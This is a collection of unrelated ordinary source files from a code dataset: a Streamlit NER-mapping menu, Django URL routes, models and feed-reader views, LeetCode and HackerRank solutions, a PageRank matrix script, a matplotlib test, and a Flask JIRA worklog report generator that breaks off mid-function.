st.error('Please define a name for the mapping before saving!')\n elif os.path.isfile(os.path.join(self.tnm_Folder, mapping[self.tnm_attr_name].replace(' ',\n '_') + '.json')) and mode != self.tnm_mode_edit:\n val = False\n st.error(f'Choose another name. There is already a mapping with name {mapping[self.tnm_attr_name]}!')\n if val:\n mapping[self.tnm_attr_template] = False\n with open(os.path.join(self.tnm_Folder, mapping[self.tnm_attr_name].replace(' ', '_') + '.json'),\n 'w+') as f:\n json.dump(mapping, f)\n self.reset_tnm_edit_states()\n st.experimental_rerun()\n\n def validate_and_delete_mapping(self, mapping):\n val = True\n if val:\n os.remove(os.path.join(self.tnm_Folder, mapping[self.tnm_attr_name].replace(' ', '_') + '.json'))\n self.reset_tnm_edit_states()\n self.state.tnm_sel_mapping_name = None\n st.experimental_rerun()\n\n def reset_tnm_edit_states(self):\n self.state.tnm_name = None\n self.state.tnm_ntd_name = None\n\n def show_editable_mapping_content(self, mode):\n if mode == self.tnm_mode_edit and len(self.editable_mapping_names) < 1:\n st.info(\n 'There are no self-defined TEI NER Entity Mappings to edit in the moment. If you want to edit a template you have to duplicate it.')\n else:\n if self.state.tnm_mode != mode:\n self.reset_tnm_edit_states()\n self.state.tnm_mode = mode\n tnm_mapping_dict = {}\n init_tnm_ntd_name = self.state.tnm_ntd_name\n # init_use_notes=True\n if mode in [self.tnm_mode_dupl, self.tnm_mode_edit]:\n if self.tnm_mode_dupl == mode:\n options = list(self.mappingdict.keys())\n else:\n options = self.editable_mapping_names\n selected_tnm_name = st.selectbox(f'Select a mapping to {mode}!', options, key='tnm' + mode)\n if self.state.tnm_sel_mapping_name != selected_tnm_name:\n self.reset_tnm_edit_states()\n self.state.tnm_sel_mapping_name = selected_tnm_name\n tnm_mapping_dict = self.mappingdict[selected_tnm_name].copy()\n init_tnm_ntd_name = tnm_mapping_dict[self.tnm_attr_ntd][self.ntd.ntd_attr_name]\n if mode == self.tnm_mode_dupl:\n tnm_mapping_dict[self.tnm_attr_name] = ''\n if mode == self.tnm_mode_add:\n tnm_mapping_dict[self.tnm_attr_ntd] = {}\n if mode in [self.tnm_mode_dupl, self.tnm_mode_add]:\n self.state.tnm_name = st.text_input('New TEI NER Entity Mapping Name:', self.state.tnm_name or \"\")\n if self.state.tnm_name:\n tnm_mapping_dict[self.tnm_attr_name] = self.state.tnm_name\n\n self.state.tnm_ntd_name = st.selectbox('Corresponding NER task definition', list(self.ntd.defdict.keys()),\n list(self.ntd.defdict.keys()).index(\n init_tnm_ntd_name) if init_tnm_ntd_name else 0, key='tnm' + mode)\n if st.button('Save TEI NER Entity Mapping', key=mode):\n tnm_mapping_dict[self.tnm_attr_ntd] = self.ntd.defdict[self.state.tnm_ntd_name]\n self.validate_and_saving_mapping(tnm_mapping_dict, mode)\n\n def teinermapadd(self):\n self.show_editable_mapping_content(self.tnm_mode_add)\n\n def teinermapdupl(self):\n self.show_editable_mapping_content(self.tnm_mode_dupl)\n\n def teinermapedit(self):\n self.show_editable_mapping_content(self.tnm_mode_edit)\n\n def teinermapdel(self):\n selected_mapping_name = st.selectbox('Select a mapping to delete!', self.editable_mapping_names)\n if st.button('Delete Selected Mapping'):\n self.validate_and_delete_mapping(self.mappingdict[selected_mapping_name])\n\n def show_edit_environment(self):\n tnm_definer = st.beta_expander(\"Add or edit existing TEI NER Entity Mapping\", expanded=False)\n with tnm_definer:\n options = {\n \"Add TEI NER Entity Mapping\": self.teinermapadd,\n \"Duplicate TEI NER Entity Mapping\": 
self.teinermapdupl,\n \"Edit TEI NER Entity Mapping\": self.teinermapedit,\n \"Delete TEI NER Entity Mapping\": self.teinermapdel\n }\n self.state.tnm_edit_options = st.radio(\"Edit Options\", tuple(options.keys()), tuple(options.keys()).index(\n self.state.tnm_edit_options) if self.state.tnm_edit_options else 0)\n options[self.state.tnm_edit_options]()\n\n def show_test_environment(self):\n tnm_test_expander = st.beta_expander(\"Test TEI NER Entity Mapping\", expanded=False)\n\n def build_tnm_tablestring(self):\n tablestring = 'Name | NER Task | Template \\n -----|-------|-------'\n for mapping in self.mappingslist:\n if mapping[self.tnm_attr_template]:\n template = 'yes'\n else:\n template = 'no'\n tablestring += '\\n ' + mapping[self.tnm_attr_name] + ' | ' + mapping[self.tnm_attr_ntd][\n self.ntd.ntd_attr_name] + ' | ' + template\n return tablestring\n\n def show_tnms(self):\n tnm_show = st.beta_expander(\"Existing TEI NER Entity Mappings\", expanded=True)\n with tnm_show:\n st.markdown(self.build_tnm_tablestring())\n\n def show(self):\n st.latex('\\\\text{\\Huge{TEI NER Entity Mapping}}')\n col1, col2 = st.beta_columns(2)\n with col1:\n self.show_tnms()\n with col2:\n self.show_edit_environment()\n self.show_test_environment()\n","sub_path":"Menu/menu_tei_ner_map.py","file_name":"menu_tei_ner_map.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"297113540","text":"from django.urls import path, include\nfrom .views import *\n\n\nurlpatterns = [\n path(\"login/\", login_page, name=\"login_page\"),\n path(\"register/\", register_page, name=\"register_page\"),\n path(\"logout/\", log_out, name=\"logout\"),\n path(\"profile/\", profile_page, name=\"profile_page\"),\n]","sub_path":"UserProfile/userprofile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"610532614","text":"\"\"\"\nhttps://leetcode.com/problems/next-permutation/\nLC031 Next Permutation\nMedium\n\nImplement next permutation, which rearranges numbers into the lexicographically next greater permutation of numbers.\n\nIf such arrangement is not possible, it must rearrange it as the lowest possible order (ie, sorted in ascending order).\nDo not return anything, modify nums in-place instead!\n\nThe replacement must be in-place and use only constant extra memory.\nMeans you cannot list out all permutation and sort it, then find the next one.\n\nCorrect sequence (sorted):\n (1, 2, 3, 4)\n (1, 2, 4, 3)\n (1, 3, 2, 4)\n (1, 3, 4, 2)\n (1, 4, 2, 3)\n (1, 4, 3, 2)\n (2, 1, 3, 4)\n (2, 1, 4, 3)\n (2, 3, 1, 4)\n (2, 3, 4, 1)\n (2, 4, 1, 3)\n (2, 4, 3, 1)\n (3, 1, 2, 4)\n (3, 1, 4, 2)\n (3, 2, 1, 4)\n (3, 2, 4, 1)\n (3, 4, 1, 2)\n (3, 4, 2, 1)\n (4, 1, 2, 3)\n (4, 1, 3, 2)\n (4, 2, 1, 3)\n (4, 2, 3, 1)\n (4, 3, 1, 2)\n (4, 3, 2, 1)\n \"\"\"\n\nfrom typing import *\n\n\nclass Solution_A:\n\n def nextPermutation(self, nums: List[int]) -> None:\n\n if not nums:\n return None\n\n # 从后往前找到第一次出现下降趋势那个元素\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n\n # 先定位first_idx\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n\n if first_idx == -1: # 如果完美倒序上升,则已经逆序排好,直接反转即可\n nums[:] = nums[:][::-1] # nums.reverse()\n else:\n # 定位second_idx\n # 由于尾部已经是逆序排好, 所以从尾部开始倒退,第一个>first_element的元素就是second_element\n while nums[second_idx] <= nums[first_idx]:\n second_idx -= 1\n\n # complete the 
swap\n            nums[first_idx], nums[second_idx] = nums[second_idx], nums[first_idx]\n            # reverse element after first_idx\n            nums[first_idx + 1:] = nums[first_idx + 1:][::-1]\n\n\n    def prevPermutation(self, nums: List[int]) -> None:\n        \"\"\"\n        This is the opposite function: find the previous permutation.\n        Only the two comparisons need to be reversed.\n        \"\"\"\n        if not nums:\n            return None\n\n        # 从后往前找到第一次出现上升趋势那个元素\n        first_idx = len(nums) - 2\n        second_idx = len(nums) - 1\n\n        # 先定位first_idx\n        while first_idx >= 0 and nums[first_idx] <= nums[first_idx + 1]:\n            first_idx -= 1 ######## reverse comparison\n\n        if first_idx == -1: # 如果完美排序,直接反转即可\n            nums[:] = nums[:][::-1] # nums.reverse()\n        else:\n            # 定位second_idx\n            # 由于尾部已经是排序好, 所以从尾部开始倒退,第一个<first_element的元素就是second_element\n            while nums[second_idx] >= nums[first_idx]:\n                second_idx -= 1 ######## reverse comparison\n\n            # complete the swap\n            nums[first_idx], nums[second_idx] = nums[second_idx], nums[first_idx]\n            # reverse element after first_idx\n            nums[first_idx + 1:] = nums[first_idx + 1:][::-1]\n\n\n\nif __name__ == \"__main__\":\n    testCase = Solution_A()\n\n    a = []\n    testCase.nextPermutation(a)\n    assert a == [], \"Edge 0\"\n    testCase.prevPermutation(a)\n    assert a == [], \"Empty prev\"\n\n    a = [1]\n    testCase.nextPermutation(a)\n    assert a == [1], \"Edge 1\"\n    testCase.prevPermutation(a)\n    assert a == [1], \"Edge 1 prev\"\n\n    a = [1, 2]\n    testCase.nextPermutation(a)\n    assert a == [2, 1], \"Edge 2\"\n    testCase.prevPermutation(a)\n    assert a == [1, 2], \"Edge 2 prev\"\n\n    a = [1, 2, 3]\n    testCase.nextPermutation(a)\n    assert a == [1, 3, 2], \"Example 1\"\n    testCase.prevPermutation(a)\n    assert a == [1, 2, 3], \"Example 1 prev\"\n\n    a = [3, 2, 1]\n    testCase.nextPermutation(a)\n    assert a == [1, 2, 3], \"Example 2\"\n    testCase.prevPermutation(a)\n    assert a == [3, 2, 1], \"Example 2 prev\"\n\n    a = [1, 1, 5]\n    testCase.nextPermutation(a)\n    assert a == [1, 5, 1], \"Example 3\"\n    testCase.prevPermutation(a)\n    assert a == [1, 1, 5], \"Example 3 prev\"\n\n    a = [5, 1, 1]\n    testCase.nextPermutation(a)\n    assert a == [1, 1, 5], \"Additional 1\"\n    testCase.prevPermutation(a)\n    assert a == [5, 1, 1], \"Additional 1 prev\"\n\n    a = [2, 2, 2]\n    testCase.nextPermutation(a)\n    assert a == [2, 2, 2], \"Additional 2\"\n    testCase.prevPermutation(a)\n    assert a == [2, 2, 2], \"Additional 2 prev\"\n\n    a = [1, 2, 2, 2]\n    testCase.nextPermutation(a)\n    assert a == [2, 1, 2, 2], \"Additional 3\"\n    testCase.prevPermutation(a)\n    assert a == [1, 2, 2, 2], \"Additional 3 prev\"\n\n    a = [2, 3, 1]\n    testCase.nextPermutation(a)\n    assert a == [3, 1, 2], \"Extra 4\"\n    testCase.prevPermutation(a)\n    assert a == [2, 3, 1], \"Extra 4 prev\"\n\n    print(\"All passed\")\n","sub_path":"LeetCode/LC031_next_permutation.py","file_name":"LC031_next_permutation.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"326168234","text":"# In this problem, I implemented the code by using the slicing technique\n# it has O(n^2) time complexity; it is not the fastest algorithm to work with 2d arrays (aka matrices), but can still work quite efficiently with large datasets.\n\n# The problem description is: https://www.hackerrank.com/challenges/2d-array/problem\n# All test cases passed\n\nemp = []\nfor i in range(6):\n    usIn = list(map(int, input().split()))\n    emp.append(usIn)\n\ndef hourglassSum(emp):\n    a = len(emp)\n    b = len(emp)\n    ma =-1000000\n    len_emp = len(emp)\n    if a < 3 and b < 3:\n        return -1\n    for i in range(0, a - 2):\n        for j in range(0, b - 2):\n            suma = (emp[i][j] + emp[i][j+1] + 
emp[i][j+2]) + (emp[i + 1][j+1]) + (emp[i+2][j] + emp[i+2][j+1] + emp[i+2][j+2])\n\n if suma > ma:\n ma = suma\n else:\n continue\n return ma\n \n# Check Statement:\n# Input: \n# 1 1 1 0 0 0\n# 0 1 0 0 0 0\n# 1 1 1 0 0 0\n# 0 0 2 4 4 0\n# 0 0 0 2 0 0\n# 0 0 1 2 4 0\n\n# Output should be:\n# 19\n","sub_path":"HourGlasses (2D Array-DS)/2D_array_hourGlasses.py","file_name":"2D_array_hourGlasses.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"349096471","text":"\"\"\"Plot to test logscale\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef main():\n fig, ax = plt.subplots(2, 2)\n fig.subplots_adjust(hspace=0.4, wspace=0.4)\n x = np.linspace(1, 1e2)\n y = x ** 2\n\n ax[0, 0].plot(x, y)\n ax[0, 1].semilogx(x, y)\n ax[1, 0].semilogy(x, y)\n ax[1, 1].loglog(x, y)\n return fig\n\nif __name__ == '__main__':\n main()\n plt.show()\n","sub_path":"test_plots/test_logscale.py","file_name":"test_logscale.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"456411424","text":"import sys\nimport numpy as np\n\n#read from command line\nnode_n = int(sys.argv[1]) #size of nodes\nout_p = float(sys.argv[2]) #mod_value to avoid spider trap\n\nM=np.zeros([node_n,node_n], dtype=\"float64\")\n\nM_raw=np.loadtxt(\"./Relation-M.csv\",delimiter=\",\",dtype=\"int\")\nprint(f\"read:\\n{M_raw}\")\n\nfor i in M_raw:\n M[i[1]][i[0]]=1.0\n\nprint(f\"transfer to Adjacency-Matrix:\\n{M}\")\nnp.savetxt('Adjacency-M.csv',M,fmt=\"%d\",delimiter=\",\")\n\nsumM=np.sum(M,axis=0)\nprint(sumM)\n\nfor i in range(node_n):\n for j in range(node_n):\n M[i][j]=1/sumM[j] if M[i][j]==1 else 0\n\nprint(f\"transfer to Value-Matrix:\\n{M}\")\nnp.savetxt('Value-M.csv',M,fmt=\"%f\",delimiter=\",\")\n\nfor i in range(node_n):\n for j in range(node_n):\n M[i][j]=(1-out_p)*M[i][j]+out_p*(1/node_n)\n\nprint(f\"transfer to Power-iterations-Matrix:\\n{M}\")\nnp.savetxt('Power-iterations-M.csv',M,fmt=\"%f\",delimiter=\",\")\n\n","sub_path":"PageRank/method1/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"630254607","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom dateutil.relativedelta import relativedelta\n\nfrom django.db import models\n\nfrom basedata.models import SingletonModel\n\nfrom django.shortcuts import reverse\nfrom basedata.const import (\n EVENT_REMINDER_CHOICES,\n EVENT_TIME_CHOICES,\n EVENT_ICON_CHOICES,\n EVENT_REPEAT_CHOICES,\n EVENT_PARTICIPANT_TYPES_CHOICES,\n EVENT_PRIORITY_CHOICES\n )\n\n\n\n\n\nclass PlannerConfig(SingletonModel):\n number_of_agenda_items = models.PositiveIntegerField(default=10)\n autogenerate_events_from_models = models.BooleanField(default=False, \n blank=True)\n\nclass Event(models.Model):\n\n date = models.DateField()\n reminder = models.DurationField(choices=EVENT_REMINDER_CHOICES, \n default=datetime.timedelta(seconds=0))\n completed = models.BooleanField(default=False, blank=True)\n completion_time = models.DateTimeField(null=True, blank=True)\n start_time = models.TimeField(choices=EVENT_TIME_CHOICES, default=\"08:00:00\")\n end_time = models.TimeField(choices=EVENT_TIME_CHOICES, default=\"09:00:00\")\n priority = models.CharField(max_length=8, choices=EVENT_PRIORITY_CHOICES, \n default='normal')\n description = 
models.TextField(blank=True)\n    repeat = models.PositiveSmallIntegerField(default=0, choices=EVENT_REPEAT_CHOICES)\n    repeat_active = models.BooleanField(default=False, blank=True)\n    label = models.CharField(max_length=32, blank=True) \n    icon = models.CharField(max_length=32, blank=True, choices=EVENT_ICON_CHOICES)\n    owner = models.ForeignKey('employees.User', on_delete=models.SET_NULL, null=True)\n    # reminder_notification = models.ForeignKey('messaging.notification', \n    # blank=True, null=True, on_delete=models.SET_NULL)\n\n    \n\n\n    @property\n    def participants(self):\n        # query the related participants directly; this property shadows the\n        # reverse accessor, so referring to self.participants here would recurse\n        return EventParticipant.objects.filter(event=self)\n\n\n    def add_participant(self, evt_type, pk):\n        from employees.models import Employee\n        from inventory.models import Supplier \n        \n        evt_mapping = {\n            'supplier': 2,\n            'employee': 0,\n            'customer': 1\n        }\n        evt_type = evt_mapping[evt_type]\n        participant = None \n        if evt_type == 0:\n            participant = EventParticipant.objects.create(\n                event=self,\n                participant_type = evt_type,\n                employee=Employee.objects.get(pk=pk)\n            )\n        elif evt_type == 1:\n            from customers.models import Customer\n            \n            participant = EventParticipant.objects.create(\n                event=self,\n                participant_type = evt_type,\n                customer=Customer.objects.get(pk=pk)\n            )\n        elif evt_type == 2:\n            participant = EventParticipant.objects.create(\n                event=self,\n                participant_type = evt_type,\n                supplier= Supplier.objects.get(pk=pk)\n            )\n        else:\n            raise Exception('no type was specified')\n\n        return participant\n    \n    \n    def complete(self):\n        self.completed = True\n        self.completion_time = datetime.datetime.now()\n        self.save()\n\n    @property\n    def repeat_string(self):\n        mapping = dict(EVENT_REPEAT_CHOICES)\n        return mapping[self.repeat]\n\n    def repeat_on_date(self, date):\n        # eliminate past dates at the begining\n        if self.date > date:\n            return False \n\n        if self.repeat == 0:\n            return False\n\n        elif self.repeat == 1:\n            return True\n\n        elif self.repeat == 2:\n            if self.date.weekday() == date.weekday():\n                return True\n            return False\n\n        elif self.repeat == 3:\n            if self.date.day == date.day:\n                return True\n            return False\n\n        elif self.repeat == 4:\n            if self.date.day == date.day and self.date.month == date.month:\n                return True\n            return False\n\n        return False\n\n    def __str__(self):\n        return self.label\n\n\nclass EventParticipant(models.Model):\n\n    participant_type = models.PositiveSmallIntegerField(\n        choices=EVENT_PARTICIPANT_TYPES_CHOICES\n    )\n    employee = models.ForeignKey('employees.Employee', \n        on_delete=models.SET_NULL, null=True, blank=True)\n    customer = models.ForeignKey('customers.Customer', \n        on_delete=models.SET_NULL, null=True, blank=True)\n    supplier = models.ForeignKey('inventory.Supplier', \n        on_delete=models.SET_NULL, null=True, blank=True)\n    event = models.ForeignKey(\n        'Event', \n        on_delete=models.SET_NULL,\n        null=True,\n        related_name='participants'\n    )\n\n\n    def __str__(self):\n        if self.participant_type == 0:\n            return f\"Employee: {str(self.employee)}\"\n        if self.participant_type == 1:\n            return f\"Customer: {str(self.customer)}\"\n        if self.participant_type == 2:\n            return f\"Vendor: {str(self.supplier)}\"\n\n    @property\n    def participant_pk(self):\n        if self.participant_type == 0:\n            return self.employee.pk\n        if self.participant_type == 1:\n            return self.customer.pk\n        if self.participant_type == 2:\n            return self.supplier.pk\n    ","sub_path":"soapsales/event/models/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"115385401","text":"from 
django.shortcuts import render, redirect\nfrom django.contrib.auth import login as auth_login, logout as auth_logout, authenticate\nfrom feeds.feed_management import add_feed, feed_adder_func\nfrom django.contrib import messages\nfrom feeds.query_parser import *\nfrom .models import FeedUser, Feed, Source\nfrom .form import *\nimport json\n\n\ndef logout(request):\n    if request.method == \"POST\":\n        auth_logout(request)\n        return redirect('logout')\n    return render(request, 'landing/logout.html', locals())\n\n\ndef home(request):\n    if request.user.is_authenticated:\n        user = request.user.username\n        username = request.user.username\n        try:\n            FeedUser.objects.get(user=user)\n        except:\n            FeedUser.objects.create(user=user)\n    else:\n        return redirect('/registration')\n    user = FeedUser.objects.get(user=request.user.username)\n    query = Feed.objects.filter(user=user)\n    titles = []\n    i = 0\n    for o in query:\n        titles.append(feed_title(get_feed(query[i])))\n        i += 1\n    try:\n        tryes = get_feed(query[0])\n        feed = json.dumps(titles)\n    except:\n        feed = \"It seems there are no feeds.\"\n    return render(request, 'landing/home.html', locals())\n\n\ndef current_feed(request):\n    print(request.GET.get('source'))\n    http = Source.objects.get(title=request.GET.get('source')).http\n    number = request.GET.get('number')\n    feed = feed_content(http, number)\n    title = request.GET.get('title')\n    href = feed_href(http, number)\n    return render(request, 'landing/current_feed.html', locals())\n\n\ndef login(request):\n    if request.user.is_authenticated:\n        return redirect('/home')\n    return render(request, 'landing/signIn.html', locals())\n\n\ndef landing(request):\n    if request.user.is_authenticated:\n        return redirect('/home')\n    form = SignUpForm(request.POST or None)\n    if request.method == \"POST\" and form.is_valid():\n        new_form = form.save()\n        username = form.cleaned_data.get('username')\n        raw_password = form.cleaned_data.get('password1')\n        user = authenticate(username=username, password=raw_password)\n        auth_login(request, user)\n        return redirect('/signIn')\n    return render(request, 'landing/landing.html', locals())\n\n\ndef new_feed(request):\n    user = FeedUser.objects.get(user=request.user.username)\n    query = Feed.objects.filter(user=user)\n    https = []\n    for q in query.values_list('feed'):\n        i = 0\n        for c in q:\n            https.append(c)\n\n    old_titles = []\n    for h in https:\n        old_titles.append(Source.objects.get(http=h).title)\n\n    titles = Source.objects.values_list('title')\n    new_https = Source.objects.values_list('http')\n    new_titles = []\n    for t in titles:\n        i = 0\n        for c in t:\n            if c in old_titles:\n                pass\n            else:\n                new_titles.append(c)\n\n    new_form = NewFeedForm(questions=new_titles)\n    if request.method == 'POST' and 'new' in request.POST:\n        new_form = NewFeedForm(request.POST, questions=new_titles)\n        if new_form.is_valid():\n            for item in new_form.cleaned_data:\n                if new_form.cleaned_data[item]:\n                    new_feed = Source.objects.get(title=item).http\n                    o = Feed.objects.create(user=user, feed=new_feed)\n                    o.save()\n            return redirect(\"/new_feed\")\n        else:\n            print(\"smth wrong\")\n\n    old_form = OldFeedForm(questions=old_titles)\n    if request.method == 'POST' and 'old' in request.POST:\n        old_form = OldFeedForm(request.POST, questions=old_titles)\n        if old_form.is_valid():\n            for item in old_form.cleaned_data:\n                if old_form.cleaned_data[item]:\n                    old_feed = Source.objects.get(title=item).http\n                    o = Feed.objects.get(user=user, feed=old_feed)\n                    o.delete()\n            return redirect(\"/new_feed\")\n        else:\n            print(\"smth wrong\")\n\n    return render(request, 'landing/new_feed.html', locals())\n\n\ndef 
feed_adder(request):\n message = \"\"\n if request.user.username != 'admin':\n redirect('/home')\n form = FeedAddForm()\n if request.method == \"POST\" and 'add_feed' in request.POST:\n form = FeedAddForm(request.POST)\n if form.is_valid():\n source = form.cleaned_data.get('source')\n try:\n title = get_feed_title(source)\n try:\n feed_adder_func(source, title)\n message = 'Feed added!'\n print(message)\n except:\n message = 'Feed already exists!'\n print(message)\n except:\n message = 'Invalid feed source!'\n print(message)\n else:\n print('Form is not valid')\n else:\n form = FeedAddForm()\n message = 'Something wrong!'\n print(message)\n\n return render(request, 'landing/feed_adder.html', locals())\n","sub_path":"landing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"501699849","text":"import getpass\nimport textwrap\nimport argparse\nimport os\nimport socket\nfrom flask import Flask, make_response, send_file, render_template\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.lib import colors\nfrom reportlab.lib.pagesizes import landscape, letter, inch\nfrom reportlab.platypus import Paragraph, SimpleDocTemplate, Table\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom jira import JIRA\n\nif 'JIRA_SERVER' in os.environ:\n server = os.environ['JIRA_SERVER']\nelse:\n server = input(\"Enter server (e.g. jira.example.com): \")\n\nif 'JIRA_USER' in os.environ:\n username = os.environ['JIRA_USER']\nelse:\n username = input(\"Username (e.g. joe.doe): \")\n\nif 'JIRA_USERPASSWORD' in os.environ:\n password = os.environ['JIRA_USERPASSWORD']\nelse:\n password = getpass.getpass(\"Password: \")\n\nif 'JIRA_WORKLOG_FROM_DATE' in os.environ:\n from_date = datetime.strptime(os.environ['JIRA_WORKLOG_FROM_DATE'], '%Y-%m-%d').date()\nelse:\n from_date = datetime.strptime(input(\"From date (e.g. 2016-12-01): \"), '%Y-%m-%d').date()\n\nif 'JIRA_WORKLOG_TO_DATE' in os.environ:\n to_date = datetime.strptime(os.environ['JIRA_WORKLOG_TO_DATE'], '%Y-%m-%d').date()\nelse:\n to_date = datetime.strptime(input(\"To date (e.g. 
2016-12-31): \"),'%Y-%m-%d').date()\n\nif 'JIRA_PROJECTID' in os.environ:\n    project = os.environ['JIRA_PROJECTID']\nelse:\n    project = input(\"JIRA Project ID: \")\n\nif 'DAY_LOG_GOAL' in os.environ:\n    day_log_goal = int(os.environ['DAY_LOG_GOAL'])  # cast: compared against numeric hour totals below\nelse:\n    day_log_goal = 7\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--log', nargs='?', help='log')\nargs = parser.parse_args()\n\nfastdebug = 0\nhtml = 1\n\nDATE_FORMAT = \"%d/%m/%y\"\n\napp = Flask(__name__)\n\ndef get_worklog(assignee):\n\n    if fastdebug != 1:\n        jira = JIRA('https://{0}'.format(server),\n                    basic_auth=(username, password))\n        jql = 'timespent > 0 AND project = %s ORDER BY updated DESC' % project \n        issues = jira.search_issues(jql)\n    \n    assignees = dict()\n    worklogs = []\n    date_worklogs = defaultdict(list)\n    issue_worklogs = defaultdict(list)\n    issues_data = {}\n    if fastdebug != 1:\n        for issue in issues:\n            issues_data[issue.key] = issue\n            for w in jira.worklogs(issue.key):\n                started = datetime.strptime(w.started[:-5],\n                                            '%Y-%m-%dT%H:%M:%S.%f')\n                # author = w.author\n                # if author.name != assignee:\n                #\n                # this is probably crude and not very future-proofed, but it\n                # works against my JIRA cloud instance, where the above does not\n                author = w.raw['author']['name']\n                assignees[author] = assignees.get(author, 0) + 1  # tally worklogs per author\n                if author != assignee:\n                    continue\n\n                if not (from_date <= started.date() <= to_date):\n                    continue\n\n                spent = w.timeSpentSeconds / 3600\n\n                worklog = {\n                    \"started\": started, \"spent\": spent, \"author\": author,\n                    \"issue\": issue,\n                }\n                worklogs.append(worklog)\n                date_worklogs[started.date()].append(worklog)\n                issue_worklogs[issue.key].append(worklog)\n\n    ts = [\n        ('GRID', (0, 0), (-1, -1), 0.5, colors.lightgrey),\n        ('ALIGN', (0, 0), (-1, -1), 'CENTER'),\n        ('FONT', (0, 0), (-1, -1), 'DejaVuSans', 8, 8),\n        ('ALIGN', (0, 0), (0, -1), 'LEFT'),\n        ('FONT', (0, 0), (0, -1), 'DejaVuSans-Bold', 8, 8),\n        ('FONT', (0, 0), (-1, 0), 'DejaVuSans-Bold', 8, 8),\n    ]\n\n    total_spent = 0.0\n\n    day_spent = ['Total'] # key is a column number\n    def cell_value(col, row, date, issue):\n        nonlocal total_spent\n\n        is_weekend = date.weekday() >= 5 if date else None\n        if is_weekend:\n            ts.append(('BACKGROUND', (col, 0), (col, -1), colors.whitesmoke))\n\n        if row == 0 and date:\n            return date.strftime(\"%d\\n{0}\".format(date.strftime(\"%a\")[0]))\n        if col == 0 and issue:\n            return textwrap.fill(\"{0} - {1}\".format(issue, issues_data[issue].fields.summary),50)\n        if date and issue:\n            task_total = sum(map(lambda w: w['spent'],\n                                 filter(lambda w: w['issue'].key == issue,\n                                        date_worklogs[date])))\n            # this probably shouldn't be put here as it means it is computed a\n            # lot more times than need be\n            day_spent[col] += task_total\n            total_spent += task_total\n            return \"{:.1f}\".format(task_total) if task_total else \"\"\n        return \"\"\n\n    dates = get_dates_in_range(from_date, to_date)\n    day_spent = ['Total'] + [0] * len(dates)\n    data = [\n        [\n            cell_value(col, row, date, issue)\n            for col, date in enumerate([None] + dates)\n        ]\n        for row, issue in enumerate([None] + list(issue_worklogs.keys()))\n    ]\n\n    if fastdebug == 1:\n        print(data)\n        data = [['', '08\\nM', '09\\nT', '10\\nW', '11\\nT', '12\\nF', '13\\nS', '14\\nS', '15\\nM', '16\\nT', '17\\nW', '18\\nT', '19\\nF', '20\\nS', '21\\nS', '22\\nM', '23\\nT', '24\\nW', '25\\nT', '26\\nF'], ['TICKET-1', '', '', '', '', '1.0', '', '', '', '', '', '', '', '', '', '', '', '', '', ''], ['TICKET-2', '', '', '', '', '', '', '', '0.2', '', '', '', '', '', '', '', '', '', '', ''], ['TICKET-3', '', '6.0', '', '', '6.0', '3.0', '2.0', 
'7.0', '', '', '', '', '', '', '', '', '', '', ''], ['TICKET-4', '', '', '', '8.0', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']]\n        day_spent = ['Total', 0, 6.0, 0, 8.0, 7.0, 3.0, 2.0, 7.166666666666667, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n        assignees = {\"bill\": 1, \"ted\": 2}\n\n    day_spent = list(map(lambda x: round(x,1) if isinstance(x, float) else x, day_spent))\n    data.append(day_spent)\n\n    if html != 1:\n        register_fonts()\n        doc = SimpleDocTemplate('%s.pdf' % assignee, pagesize=landscape(letter))\n\n        elements = []\n\n        stylesheet = getSampleStyleSheet()\n        p = Paragraph('''\n        \n        Jira Tasks Report ({0}-{1})\n        '''.format(\n            from_date.strftime(DATE_FORMAT),\n            to_date.strftime(DATE_FORMAT)), stylesheet[\"BodyText\"])\n        elements.append(p)\n\n        cw = [None] + [0.2*inch] * (len(data[0]) - 1)\n        t = Table(data, style=ts, colWidths=cw)\n        elements.append(t)\n\n        p = Paragraph('''\n        \n        Total Hours: {:.2f}\n        '''.format(total_spent), stylesheet[\"BodyText\"])\n        elements.append(p)\n\n        doc.build(elements)\n        print('Done')\n        return doc\n\n    # now the html way...\n    table = html_table(data)\n    # other assignees\n    aprint = map(lambda x: ''+str(x)+'',\n                 list(assignees.keys()))\n    aprint = \", \".join(aprint)\n    return render_template('output.html',\n                           name=assignee,\n                           table=table,\n                           total=total_spent,\n                           assignees=aprint)\n\n#\n# build our own html table that puts emphasis on the ticket names, the day\n# totals, and colors any column with more than 7 hours worked as green\n# ...input is a 2 dimensional table\n#\ngoodcolor=' style=\"background-color:#00FF00\"'\nwecolor=' style=\"background-color:whitesmoke\"'\ndef html_table(data):\n    output = \"<table><thead>\"\n    lastrow = len(data)-1\n    for row, column in enumerate(data):\n        if row == 1:\n            output += \"</thead>\\n<tbody>\\n\"\n        output += \"<tr>\"\n        for 